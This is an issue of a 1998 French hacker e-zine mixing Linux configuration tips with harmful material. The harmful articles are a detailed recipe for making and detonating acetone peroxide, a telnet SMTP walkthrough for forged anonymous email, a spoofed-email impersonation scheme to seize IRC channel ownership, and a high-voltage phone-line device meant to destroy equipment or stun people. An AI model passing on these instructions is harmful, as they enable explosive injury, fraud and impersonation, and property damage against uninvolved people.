-http-gw: relais pour client HTTP et gopher .( pratique pour empcher certaines applications JAVA )
....
Il y en a d'autres mais je les connais pas tous donc pour plus de renseignement allez voir vous mme!
exemple de config de /usr/local/etc/netperm-table:
tn-gw: deny-hosts * -dest 193.1.1.*
Interdiction a ces machines d'accder au service telnet .
tn-gw: permit-hosts 193.1.1.25
autorise la machine 193.1.1.25 a accder au service telnet .
Pas compliqu et je vous jure que c'est incroyable tout ce que l'on peut faire et les espces de security hole que ca peut faire.
The FrHack Crew
Snowcrach
Bas sur le livre de Linux
-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Peroxyde d'acetone
Le peroxyde d'actone est un explosif trs puissant. J'estime environ ca
puissance
10 fois suprieur a celle de la poudre noir (Poudre
canon).
Dans le texte qui va suivre, je vais vous expliquer comment en produire. Vous
allez etre tonner mais ce n'est pas vraiment compliquer, mais faut savoir
comme s'y prendre.
Matriaux
1 bouteille de 2 litres de liqueur vide (avec bouchon)
1 Sac a poubelle noir trs foncer (Pour mettre la bouteille dedans)
1 bain, ou un grand lavabo (L'eau qui va avec bien entendu)
1 Filtre a caf (ou 2)
1 sac blanc
1 vielle passoire
Jusqu'ici les composantes sont pas trs difficile a trouver, c'est maintenant
que cela ce complique un peu.
500 ml d'acetone pur
On trouve l'acetone
la Quincaillerie du coin, dans la section
dilluant a peinture.
450 ml de Peroxyde 30%
On trouve le peroxyde 30% dans quelques pharmacies ,dans la section
teinture pour cheveux, ou dans un centre de coiffure. Bien important
faut pas que le peroxyde soit en crme comme a quelques endroits qui
en vendent, mais bien un liquide transparant comme de eau.
20 ml d'acide muriatique 20% (HCL)
On retrouve l'acide muriatique
la quincaillerie du coin, dans la
section piscine, ou dans un centre de la piscine.
ATTEMTION: Ce produit est tres dangereux, ne le respirer pas et
essayer de pas entrer en contact avec celui-ci.
Procdures
Tout ce qui va suivre ne doit pas etre fais dans une maison. Apres avoir vcu
l'exprience, j'Ai dcider de faire ca dans un garage bien arer, ou meme
dehors. Sinon vous risquer de brailler durant une coupe d'heure par rapport
a vos yeux qui brle et de la difficult a respirer.
Vous versez le 500 ml d'Acetone dans la bouteille 2 litre, au soin prener un
entenoir. Ensuite vous verser le 450 ml de Peroxyde de la meme manire dans
la bouteille. La pour ceux qui sont pas vite vite, vous etes rendu avec une
solution de 950 ml. C'est maintenant que cela vient un peu plus dangereux.
Verser directement dans la bouteille les 20 ml Acide muriatique, mais pas
avec le meme entenoir que prcdament, ou laver le bien et essuyer le bien.
Sinon une petite raction chimique va se produire. Ensuite agiter un peu.
ATTENTION: Attender avant de mettre le bouchon.
Quand vous allez verser l'Acide muriatique, une petite raction chimique va
se produire. C'est normal que cela fasse de petite bulle au dessus de la
solution avec des vapeurs et que le fond de la bouteille soit un peu chaud. Cela devrais durer au maximum 25 min. Apres 25 min tout devrais etre rentrer
dans l'ordre.
ATTENTION:
Si le fond de la bouteille est encore chaud apres 25 minutes
ou qui a encore des vapeurs, jeter votre solution. Vous avez rater l'exp-
rience. Moi je dois vous avour que sur environ 20 fois, cela met arriver
seulement une fois. Je ne peux expliquer la cause.
Ensuite viser le bouchon.
Maintenant vous avez le principal de fait. Ensuite faite couler de l'eau
dans votre bain (Lavabo) (Juste de l'eau froide, environ
4 celcius) Pour que la bouteille soit recouverte completement. Dposer la bouteille dans le sac noir,et ensuite dposer le sac noir (Contenant la bouteille) dans l'eau.
Assurer vous que la bouteille est recouverte du sac noir partout, et que le
sac est completement dans l'eau.
La il faut patienter 2 jours, en laissant le tout comme ca. Apres deux
jours, ou plus, Vous sorter la bouteille, et vous aller voir une petite
poudre blanche dans le fond. Cette poudre est le peroxyde d'Actone. Main-
tenant vous devez la filtrer. Prener un filtre a caf et une vielle passoir.
Dposer le filtre dans la passoir, au besoin vous pouvez mettre 2 filtres.
Vider votre solution dans ce filtre au dessus d'un vier ou au dessus
d'un plat. Jeter la solution qui reste.
La maintenant il ne vous reste plus qu'a faire secher la poudre. Prener un
sac en plastique blanc, si le sac est de couleur votre poudre va prendre la
couleur. Bien important que ca soit du plastique. Ensuite laisser scher
durant 2 jours a l'air. Pas dehors sinon vous risquer de perdre votre pou-
dre avec le vent. Ni dans votre maison a cause des vapeurs. Faire secher
dans un garage ou autres. Attention faut pas qui n'est aucune chaleur. PAs
au gros soleil, ni pres d'une lumiere. Apres 1 journer la poudre peut
vous sembler seche, mais erreur, elle reste humide pareille un peu. Et si
vous la stocker, vous risquer de la retrouver tres tres humide apres
quelques jours. LAisser scher au moins 2 jours minimum. Et voila vous avez
du peroxyde d'Actone.
Faite pas sauter tout votre poudre d'un coup, essayer une petite dose avant.
1 gramme, et vous aller etre tres surpris. Si la poudre est comprimer une
dtonation se produit, sinon vous aler avoir un champignon de feu.
Cette poudre est tres explosive, si elle est bien faire, une grosse pierre
lancer sur celle ci devrais dclancher une explosion. La je vous averti,
cette poudre est tres tres puissante, c'est pouquoi faite attention. Je vous
conseille pas d'Allumer celle si avec une meche, mais plutot avec un dtonateur.
The FrHack Crew
_Franck
-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Trojan
Bon... pour le zine de frhack j'ai dcid de vous parler un peu des trojans. Oui... ces petits programmes lames qui servent seulement a causer de la merde. Je vais vous expliquer comment c'est fait, comment ca agit, dpendemment des types, puis comment s'en dbarasser videmment. Je ne vous expliquerai pas comment s'en servir, parce que c'est tellement simple, et surtout tellement STUPIDE que mon frre de 8 ans pourrait devenir un SUPER DUPER HACKER avec cette merde la.
Socket de troie (par JCzic)
Le premier trojan a tre connu, c'est en meme temps un des plus dangeureux. C'est seulement un petit Serv-U (un serveur FTP) cach dans un fichier.. puis qui est lanc au dmarrage de votre ordinateur. Ca donne le contrle total de votre ordinateur. Une petite interface graphique trs simple pour le client, et le tour est jou, n'importe quel enfant peur dtruire votre HD. Le problme est facile a dtecter, il y a une petite fenetre qui s'ouvre et qui dit... "un fichier .DLL requis, Setup32.dll, n'a pas t trouv" , ISAPI32.DLL pour la deuxime version... puis il y a la troisime. La troisime version est vraiment une catastrophe.. un virus de la pire espce. Celui la, tu le caches dans n'importe quel fichier, pis ca agit comme un vrai virus... souvent tu dois rinstaller winblows meme... tk .. lame.
Back Orifice (par le Cult of the Dead Cow)
Un peu diffrent comme concept... c'est plutot un programme qui pourrait servir a un admin de rseau. Il est encore plus dangeureux que le socket de troie... pourquoi? parce qu'il permet l'accs a des ressources que meme vous n'avez pas acces... les dll par exemple. Quand vous tes infects... c'est parce que vous aurez ouvert un ptit fichier sans icone (ca c'est stupide dja en partant) et qu'il y a une petite fenetre M$DOS qui va tre apparue. L'interface du controle est un petit peu moin simple... alors disons qu'un enfant de ... 10 ans pourrait s'en servir... c'est bon quand meme une volution de 2 ans.
NetBus et les autres
Ceux la sont un petit peu moin connus... si tu regardes NetBus.. il est pas trs dangeureux. C'est plus pour s'amuser... prendre des screenshots... entk c poche quand mme. Je vous dirais que de toutes facons, n'importe quel trojan est vraiment la chose la plus conne, meme si c'est considr comme du hack. Pour ceux qui savent moindrement ce que c'est que le hack, vous vous rendrez compte que
trojan != hack .. de toutes facons.. si vous tes un enfant de 10 ans vous allez pouvoir devenir un mega hacker!!!! aprs cet article si jamais ya encore quelqu'un qui pause des question sur les trojans jva lui en servir un sur un plat pour qu'il goute a sa propre mdecine.
The FrHack Crew
Bismuth
-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Port Linux
-=-=-=-=-=-=-=Allow / Deny =-=-=-=-=-=-=-=-
Pratique si vous avez un shell ou une box et que
vous ne voulez pas vous faire hacker par telnet (23).
C`est tellement simple,
1.Vous allez dans /etc (C`est la qu`il y a la plupars des configurations)
2.Tappez pico inetd.conf et vous verrez quelque chose comme ceci,
_______________________________________________________________________________________________|
#
# inetd.conf This file describes the services that will be available
# through the INETD TCP/IP super server. To re-configure
# the running INETD process, edit this file, then send the
# INETD process a SIGHUP signal.
#
# Version: @(#)/etc/inetd.conf 3.10 05/27/93
#
# Authors: Original taken from BSD UNIX 4.3/TAHOE.
# Fred N. van Kempen, <waltje@uwalt.nl.mugnet.org>
#
# Modified for Debian Linux by Ian A. Murdock <imurdock@shell.portal.com>
#
# Modified for RHS Linux by Marc Ewing <marc@redhat.com>
#
# <service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
#
# Echo, discard, daytime, and chargen are used primarily for testing.
#
# To re-read this file after changes, just do a 'killall -HUP inetd'
#
#echo stream tcp nowait root internal
#echo dgram udp wait root internal
#discard stream tcp nowait root internal
#discard dgram udp wait root internal
#daytime stream tcp nowait root internal
#daytime dgram udp wait root internal
#chargen stream tcp nowait root internal
#chargen dgram udp wait root internal
#
# These are standard services.
#
#ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
gopher stream tcp nowait root /usr/sbin/tcpd gn
# do not uncomment smtp unless you *really* know what you are doing.
# smtp is handled by the sendmail daemon now, not smtpd. It does NOT
# run from here, it is started at boot time from /etc/rc.d/rc#.d.
#smtp stream tcp nowait root /usr/bin/smtpd smtpd
#nntp stream tcp nowait root /usr/sbin/tcpd in.nntpd
#
# Shell, login, exec and talk are BSD protocols.
#
shell stream tcp nowait root /usr/sbin/tcpd in.rshd
login stream tcp nowait root /usr/sbin/tcpd in.rlogind
#exec stream tcp nowait root /usr/sbin/tcpd in.rexecd
talk dgram udp wait root /usr/sbin/tcpd in.talkd
ntalk dgram udp wait root /usr/sbin/tcpd in.ntalkd
#dtalk stream tcp waut nobody /usr/sbin/tcpd in.dtalkd
#
# Pop and imap mail services et al
#
pop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d
pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d
imap stream tcp nowait root /usr/sbin/tcpd imapd
#
# The Internet UUCP service.
#
#uucp stream tcp nowait uucp /usr/sbin/tcpd /usr/lib/uucp/uucico -l
#
# Tftp service is provided primarily for booting. Most sites
# run this only on machines acting as "boot servers." Do not uncomment
# this unless you *need* it.
#
#tftp dgram udp wait root /usr/sbin/tcpd in.tftpd
#bootps dgram udp wait root /usr/sbin/tcpd bootpd
#
# Finger, systat and netstat give out user information which may be
# valuable to potential "system crackers." Many sites choose to disable
# some or all of these services to improve security.
#
# cfinger is for GNU finger, which is currently not in use in RHS Linux
#
finger stream tcp nowait root /usr/sbin/tcpd in.fingerd
#cfinger stream tcp nowait root /usr/sbin/tcpd in.cfingerd
#systat stream tcp nowait guest /usr/sbin/tcpd /bin/ps -auwwx
#netstat stream tcp nowait guest /usr/sbin/tcpd /bin/netstat -f inet
#
# Time service is used for clock syncronization.
#
time stream tcp nowait nobody /usr/sbin/tcpd in.timed
time dgram udp wait nobody /usr/sbin/tcpd in.timed
#
# Authentication
#
auth stream tcp nowait nobody /usr/sbin/in.identd in.identd -l -e -o
#
# End of inetd.conf
linuxconf stream tcp wait root /bin/linuxconf linuxconf --http
------------------------------------------------------------------------------------------------|
-===Tout les ports avec un # sont ferm exemple:#ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a (le port ftp/shell est ferm)
----------->Pour l`ouvrir ta rienque a enlever le # .
NE JAMAIS FERMER LE PORT "auth"
Apres tu fais save... (Si tu veux faire des shells account tu dois l`aiss ton port telnet et ftp ouvert.)
Apres tu fais pico hosts.allow
Tu devrais voir quelque chose comme ceci:
________________________________________________________________________________________________|
#
# hosts.allow This file describes the names of the hosts which are
# allowed to use the local INET services, as decided
# by the '/usr/sbin/tcpd' server.
#
in.telnetd: .loginnovation.com, 206.167.170., .videotron.net, .ivic.qc.ca, 206.231.210., .concepta.com
in.telnetd: .videotron.net, 207.96.178., .refract.ctron.net, .total.net, .enter-net.com, 206.167.49.
in.ftpd: .loginnovation.com, 206.167.170., .videotron.net, .ivic.qc.ca, 206.231.210., .concepta.com
in.ftpd: .videotron.net, 207.96.178., .refract.ctron.net, total.net, .enter-net.com, 206.167.49.
in.telnetd: .quebectel.com, 142.169.181.
in.ftpd: .quebectel.com, 142.169.181.
_________________________________________________________________________________________________|
Tu met les adresses de ceux qui ont des shells seulement,exemple:Tu fais un shell a quelqun sur videotron alors tu mettra
.videotron.net, dans la liste.. si il est seul a avoir le shell laisse le seul dans la liste.Ceci empechera quelqun dun
autre providers de lui voler son pass etc...
Il pourra rentrer si il utilise un telnet spoof....
The FrHack Crew
Khanabyss
-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Server SMTP
Je vais vous parler de l'envoie d'un mail par les serveurs SMTP.
Rien qu'avoir ca vous devez vous dire ca sert
rien.... car y'a les programmes pour ca.
Mais vous vous trompez c'est super pratique car vous pouvez envoyez un mail de fred
jerome sans que fred sache que vous envoyez ce mail a jerome et donc vous envoyez votre mail d'un maniere totalment anomyne... Et en ^plus vous aurez la joie d'avoir realiser ca vous meme et pas simplement aoie tapez l'emeteeur le recepteur le texte et d'avoir cliker sur send tout ca sur un logi fait par un ducon de progamateur anglophones.....
Il peut y avoir quand meme un risque de se faire tracer donc si vous avez un IP fixe GARE A VOUS en revanche si vous avez un IP non fixe alors c'est deja moins risquez mais mefiez vous quand meme car on c'est jamais et surtout pour le serveur SMTP que vous choisirez NE PRENEZ PAS CELUI DE VOTRE PROVIDER car si vous etes tracer vous serez tres vite gaulez....
Bon on se met au travail :
--------------------------
*materiel :
un ordinateur avec telnet (donc Win 95 / 98 et voire meme win 3.11 mais bon...)
un serveur SMTP valide (bon je vais poas vous insultez en vous expliquant comment en trouver un car si t'es pas un newbies ? Non ? et si oui tanpis ;)
des doigts ou des orteils a default mais c'est plus dur pour tapez car sur ces serveurs les BACKSPACE ne sont pas pris en compte donc faut pas faire de faultes......
un cerveau et de la bonne volonte...
*ALLEZ au travail:
vous avez donc vot serveur valide et vous y acceder par telnet
Choisisez un serveur qui au lancement affiche 220 plutot qu'un seveur qui vous affiche un putain de merde de grand barratin qui sert a rien....
Voici un tit exemple :
220 bill.gates.net SendMail X-320 Io v40.5 Ready at Wed, 18 Nov 1998 02:20:53 E
* HELO bill.gates.net
250 bill.gates.net Hello mon.domaine.com (mon.domaine.com), pleased to meet you
* MAIL FROM:<bill@microsoft.net>
250 <bill@microsoft.net>...Sender Ok!
* RCPT TO:<linux@power.net>
250 <linux@power.net>...Recipient Ok!
* DATA
354 Please enter your message body, ending with a "." on a line by itself
* Alut ! toa ca feel moa ca feel
* bon je vais te leaisser c'est pu koi te dire
* au fait je te retourne
* .
250 Mail Ok!
* QUIT
Bon au cas ou t'as poas compris mais si t'as poas cmpris on va tout mettre au clair
les * sont au commencement des lignes tapez par l'utilisateur et donc FAUT POAS LES TAPER...
Et bon j'ai vraiment rien de mieux a foutre je vous resume les commandes ...
Putain je m'etonne tellemtn que je suis bon... ou meme con ...
Eh si tu pense que suis con vient me le dire en face ;)
Bon alors v'la tes commandes :
HELO bill.gates.net : c'est un truc essentiel c'est le nom du domaine donc ...
MAIL FROM:<(behn la je crois que tu comprend ce qui faut marque)>
RCPT TO:<(behn la aussi c'est la poire que tu maile...)>
DATA : c'est pour commence a entrer le texte de ton mail...
. : c'est pour finir ton mail
HELP : c'est si t'as besoin d'aide
QUIT : je comprend poas a qoui ca sert...
The FrHack Crew
Langly
-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Slogan
/msg #hack.fr Bon tlm, dite dequoi d'intelligente qui va paraitre dans le Emag.
<PsYkAoS> You must follow the Goodway
<oktober> uh..
/msg #hack.fr Tu peux faire mieux oktober.. :)
<oktober> "Follow The Leader"
<oktober> Mieux vaut tre dur de la feuille que mou de la branche!
<oktober> Des erreurs de jeunesse, c'est si vite arriv.
<_Franck> Souhaitons que lui meurt pas en sortant!!
<oktober> Bah, a risque pas d'arriver!
<oktober> FOLLOW THE LEADER!
<Snowcrach> Le gourvernement as t invent pour nous crosser
<Snowcrach> Les compagnies tels FT ont t invent pour nous crosser
<Snowcrach> Le hacking as t invent pour nous librer
<Snowcrach> Amen :)
<NuClEaR> ces le 2e zine en 1 ans!!! donc l'autres est pour l'ans prochain
<[ewoks]> j ai une thorie paradoxale que j ai inventer qui me plait bien "tous est relatif sauf la bouffe" mais ses stupide pi s am arrive de dire sa quandje suis sur mon trippe bouffe s afeque
<[ewoks]> je ne crois pas en se que vous dite mais je serais pret a me battre pour que vous puissez le dire -=Voltaire=-
<Cub1c> Mourrir n'est pas bon pour la sant - Sant Canada
-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
WeaponX boxe
C'est box marche a base d'nergie static ,et cette nergie peut crer beaucoup de volts
et peu d'amprage (Juste assez pour faire fondre un modem ou assomer litralement
quelqu'un).
Pour la construire vous aurez besoin de faire:
-Dconnecter tous les tlphones de votre ligne , ou tout autre objets qui utilise la ligne
tlphonique(rpondeur,boite vocale,modem,etc).
-Dpluger toutes tlvisions,radio ou autre pour viter le danger.
-Vous aurez besoin d'un gnrateurs d'nergie static.
-Connecter une balle de cuivre au fils rouge et une barre de mtal au fils vert.
-Mettez quelque chose pour vous protger les mains(matriaux non conducteurs) come des gants
de vaiselles en ROBER
-Meter votre gnrateur
au moins 10 000 volts
-Metter votre boulle de cuivre coller sur le Gnrateur d'lectricit static.Tener la barre de Fer
dans votre autre main et garder la loin de votre Gnrateur(au moins deux pieds de l'autre sens).
-Composer le numro
-Metter la bar de fer au dessus du Gnrateur il vas y avoir des petites clairs n'ayez pas peur.
-Aprs quelque secondes une grosse clair va aparaitre du Gnrateur a la bar de fer.Tener bien la bar
et ne la bouger pas.
-Le tlphone va faire un bruit bizarre et ensuite peut-tre que votre prise de courant va fondre,mais
Le rsultat va tre trs bons.
Voici un plan de ce que ca devrait ressembler
------------------
| 1 2 3 |
| |
| 4 5 6 |
| |
| 7 8 9 |
| |
| # 0 * |
------------------
| |
Boule de cuivre | |
_ | | Bar de Fer
(_)-----| |---------------------
| |
Fils rouge------->| |
| |>-----fils vert
Gnrateur | |
-------- | |
| | | |
| | | |
| | | |
-------- | |
D'nergie static | |
-----------------------------------------------
Plogue dans le mur
The FrHack Crew
Snowcrach
-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Password Linux
Un des fichiers les plus important sur un systme linux (et un des plus intressant pour la plupart d'entre nous :) ) est le fichier passwd. J'ai donc dcid de vous offrir une petite introduction
ce fichier.
D'abord, la structure :
Chaque ligne reprsente un utilisateur, un deamon ou un service du systme... Chaque ligne est spare en parties par des " : " qui reprsentent chacun un segment d'information sur les accs et droits de l'utilisateur.
Ex : root:x:0:0::/root:/bin/bash
- La premire partie de la ligne reprsente le nom de l'utilsateur.
- La deuxime reprsente le mot de passe de l'utilisateur (il est encod). Si un X ou un * se trouve
cette place, c'est parce que les mots de passe se retrouve dans un autre fichier appel fichier shadow, cette mesure sert de double scurit car si quelqu'un russi
se procurer le passwd file, il devra aussi avoir le shadow pour pouvoir dcrypter les passwords.
- Le troisime champ est l'UID, le User ID qui sert a identifier l'utilisateur par un numro pour le systme d'exploitation.
- La quatrime position est le GID, le Group ID qui identifie le # du groupe auquel appartient cet utilisateur.
- En cinquime position vient le champ de commentaire qui peut servir
mettre le vrai nom d'un utilisateur ou d'autres infos.
- La position suivante est le rpertoire home de l'utilisateur, le rpertoire ou il se retrouve lorsqu'il se log sur le system.
- En dernier, nous retrouvons la premire commande excute lorsque l'utilisateur se log, il s'agit habituellement d'un interprteur de commande qui permettra
ce mme utilisateur d'entrer certaines commande pour interagir avec l'OS.
Exemple de fichier passwd complet : (ce fichier se trouve dans /etc/passwd)
operator:x:11:0:operator:/root:/bin/bash
root:x:0:0::/root:/bin/bash
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
sync:x:5:0:sync:/sbin:/bin/sync
bin:x:1:1:bin:/bin:
ftp:x:404:1::/home/ftp:/bin/bash
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
mail:x:8:12:mail:/var/spool/mail:
postmaster:x:14:12:postmaster:/var/spool/mail:/bin/bash
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
man:x:13:15:man:/usr/man:
guest:x:405:100:guest:/dev/null:/dev/null
nobody:x:65534:100:nobody:/dev/null:
daft:x:1000:100:,,,:/home/daft:/bin/bash
Son utilit :
Le fichier permet entre autres de rcuprer le mot de passe d'un systme si ce dernier ne les a pas mis en shadow. Il permet aussi d'enlever un utilisateur du systme en effacant la ligne qui lui correspond dans le fichier.
NOTE : Ne tentez jamais de modifier le champ du mot de pass en le changeant directement dans le fichier passwd (hhhh, bin vous pouvez essayer, mais je garantis pas la validit du passwd que vous allez avoir entr!)
Scurits possibles :
Il y a diffrent systmes qui enlvent le champ du passwd pour le remplacer en x ou * pour des raisons de scurit.
Il y a d'abord le systme des shadowed passwd files qui enlvera tous les passwd du fichier passwd pour les mettre dans le fichier " shadow ".
Ensuite, il y a le NIS (network information system) qui lui utilise une banque centralise d'information sur les utilisateurs et leurs mots de passe (trs rare).
Finalement, il y a les Yellow Pages qui n'utilisent pas le champ rserv au mot de passe dans passwd et qui fonctionne
la manire de NIS.
Il y a naturellement d'autres systmes mais ceux-ci sont les plus courants.
The FrHack Crew
Oktober
-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Coment resetter le password du op 500 sur undernet
Il y a plusieur mtode. Ca devrait marcher facilement sur les petit channel
car vous devez avoir un access 450 et + .
Methode Facile
Vous tes sur un nouveau channel et il y a un X ou W . Essayer de faire du SE
pour avoir un access 499. Lorsque vous avez votres access, faites en un autres avec
un nick quasiment pareille au 500 . Exemple: Admetons que le 500 c'est FILA667,
tu fais un access a FILA667, et le reste doit se faire par e-mail . Vous devez prendre
le e-mail du 500 . Trouver un mailleur annonyme ou utiliser la thecnique du server SMTP
comme expliqu ci-dessus et c'est partit. Comme adresse de l'expediteur ecrivez celle
du 500 (adresse a envoyer ces w@undernet.org ou x@undernet.org
dependament si c'est X ou W dans le channel). Bon voici le formulaire, copier coller le dans
le e-mail et inscriver-y ceci:
-----------------------------------
S'il vous plait, inscrivez un "X" a l'endroit approprie:
1) __ Correction de Mask
2) __ Ajouter un(des) nouveau(x) user@host(s)
3) __ Nouveau fournisseur internet; mon user@host dois etre change
4) __ Autre
Description:
S'il vous plait, fournir les informations
suivantes:
Canal:
Bot (X/W):
Votre Nickname:
User@host actuel:
Nouveau user@host:
Voulez-vous le(s) nouveau(x) Mask(s)
ajoute(s) a X/W comme vous l'avez demandez? (Oui/Non):
Si oui, a quel(s) niveau(x) d'acces, et sous quel(s) Nickname(s)?
Ancienne adresse e-mail:
Nouvelle adresse e-mail:
(Si necessaire)
_______________________________
Bon voici ce que vous ecrivez:
Dison que je veux le faire au canal #quebec
et que le 500 est DragGuard et que mon host est *!*@*.cite.net et mon e-mail est
bill@microsoft.com , voici ce que j'ecrit:
· la premire question je coche :
2 (ajout d'un news user host)
apres dans canal j'ecrit:
#quebec
apres dans bot:
x
dans votres nick ces:
Draguard (avec juste un g pour le faker)
dans user host actuel:
undernet@step.polymtl.ca
apres ca dans nouvelle host:
undernet@*.cite.net
Voulez-vous le(s) nouveau(x) Mask(s)
ajoute(s) a X/W comme vous l'avez demandez? (Oui/Non): tu ecris: OUI
Si oui, a quel(s) niveau(x) d'acces, et sous quel(s) Nickname(s)?
access 500 nick: draguard
Ancienne adresse e-mail:
%?$%%@?%$?%?.com (tu ecrit l'adresse du 500)
Nouvelle adresse e-mail: bill@webmaster.com (tu ecris ton vrai e-mail)
(Si necessaire)
Une fois terminer, vous incluer:
P.S mon access sur mon ancien provideur fini aujourd'hui, veuiller envoyer
le courier
bill@microsoft.com
Envoyer le message.
Aprs quelques temps vous aurez un retour de mail vous indiquand si la demande as t accepter. Si oui , le e-mail inclura un password temporaire. Servez-vous en bien.
The FrHack Crew
NuClEaR
-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Configuration de la souris sous X
La souris
Xfree86 utilise beaucoup la souris. Vous devez donc indiquer le type de la vtre et comment elle est connecte au systme. XFree86 reconnat la majorit des souris usuelles et un type qui ne serait pas support directement peut souvent simuler une souris plus courante. Dans le fichier de configuration, la section concernant
la souris se nomme Pointer (pour un priphrique de dsignation ou de pointage), et ressemble
ceci :
Section " Pointer "
Protocol " Microsoft "
Device " /dev/mouse "
# Si vous utilisez XQUEUE, commentez les deux lignes prcdentes et uncommentez la suivante
# Protocol " Xqueue "
# Baud rate et Samplerate ne concerne que quelques souris Logitech
# BaudRate 9600
# SampleRate 150
# Emulate3Buttons est une option pour les souris Microsoft
deux boutons
# Emulate3Buttons
# ChordMiddle est une option pour certains souris Logitech
trois boutons
# ChordMiddle
EndSection
La clause Protocol dsigne la souris ou l'mulation
utiliser. La page de manuel de Xconfig ou XF86Config indique la liste des types de souris reconnus. Si vous avez une souris d' un autre fournisseur que Microsoft ou Logitech, lisez cette page de manuel, ou toute autre documentation
votre disposition, afin de dterminer le protocole
utiliser. Une autre mthode pour dterminer le type de la souris consiste
observer les messages affichs au dmarrage de linux - il identifie souvent la souris. Les souris Microsoft utilisent toujours le protocol Microsoft. Beaucoup de souris Logitech sont compatibles avec Microsoft, mais les plus rcentes utilisent le protocol Mouseman. Les souris Dexxa (et celles de nombreux autres fabriquants) mulant une souris Microsoft, vous pouvez utiliser ce protocol avec celles ci...
La clause Device dfinit le port auquel la souris est attache,
l'aide de la terminologie Linux. Dans la majorit des cas, il suffit d'indiquer /dev/mouse, la procdure d'installation de Linux ayant dj
configur la souris. Si vous utilisez une souris sur le port PS/2 d'un IBM PS/2, utilisez le pilote de priphrique PS/2 et non pas un pilote de port srie. Les pages de manuel et la documentation de Xfree86 indiquent les pilotes de priphriques valides, mais la plupart des versions reconnaissent le suivants :
/dev/mouse
Pilote de souris par dfaut
/dev/inportbm
Souris Microsoft uniquement (bus microsoft)
/dev/logibm
Souris Logitech uniquement (bus logitech)
/dev/psaux
Souris sur le port PS/2
Une souris sur le bus (par opposition
une souris srie) utilise une IRQ particulire, tant dans le noyau que dans Xfree86. Assurez-vous que la valeur utilise est la mme partout!
De mme que pour le clavier, une clause existe pour les utilisateurs de Xqueue. La majorit des installations de Xfree86 n'utilisant pas Xqueue, laissez cette ligne en commentaire. Le dbit et l'chantillonnage (clauses Bitrate et SampleRate), comme le commentaire l'indique concernent des anciennes souris Logitech. La plupart des souris n'en ont pas de besoin, laissez donc ces lignes commentes. Si votre souris ne fonctionne pas sans ces clauses, essayez d'abord un dbit de 9600 bauds puis, si cela ne va toujours pas, de 1200. Certaines anciennes versions de Xfree86 utilisaient toujours la clause BaudRate, mais commencez d'abord par la laisser en commentaire.
L'option Emulate3Buttons est utile si votre souris n'a que deux boutons. Dans ce cas, elle permet de simuler la prsence d'un troisime bouton par l'enfoncement simultan des deux boutons. Beaucoup d'applications linux utilisent les trois boutons de la souris, cette option est donc utile pour les souris Microsoft et compatibles.
Finalement, l'option ChordMiddle s'applique
quelques souris Logitech. Si vous utilisez le pilote Logitech, commencez par tester votre souris sous Xfree86 sans cette option. Si elle ne se comporte pas correctement, retirez le commentaire de la ligne. La majorit des souris Logitech n'a pas besoin de cette option, mais certains modles ne reconnaitront pas correctement le bouton du milieu sans elle.
The FrHack Crew
Oktober
-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Conclusion
Bon... je n'ai jamais eu de talent pour les conclusions, alors je vais tre direct. Nous esprons que vous avez aprci le deuxieme Emag de FrHack et nous comptons en sortir un autre le premier fvrier 1999. Je tiens
remercier tout les colaborateurs de ce Emag, aussi tout le monde qui vienne sur #hack.fr quotidiennement , les hackers, les codeurs, les phreakers, les anarchistes, et tout ce beau monde qui continue sans cesse de faire chier le gouvernement (Simple vengeance). Je tiens aussi
remercier specialement :
-Brain Override pour mavoir aider
repartir FrHack.
-PsYkAoS pour m'avoir aider
administrer ce channel.
-Oktober mon guru de linux prfr.
-NuClEaR pour m'avoir aider
registr ce channel.
-Le Pepsi pour m'avoir aid
rester veiller toutes ces nuits blanches que j'ai pass
coder.
Et tous les autres que j'ai pas inclu et qui m'ont aid pour FrHack.
Si vous avez des questions ou des recommandations : Snowcrash23@hotmail.com
Snowcrach et l'quipe de FrHack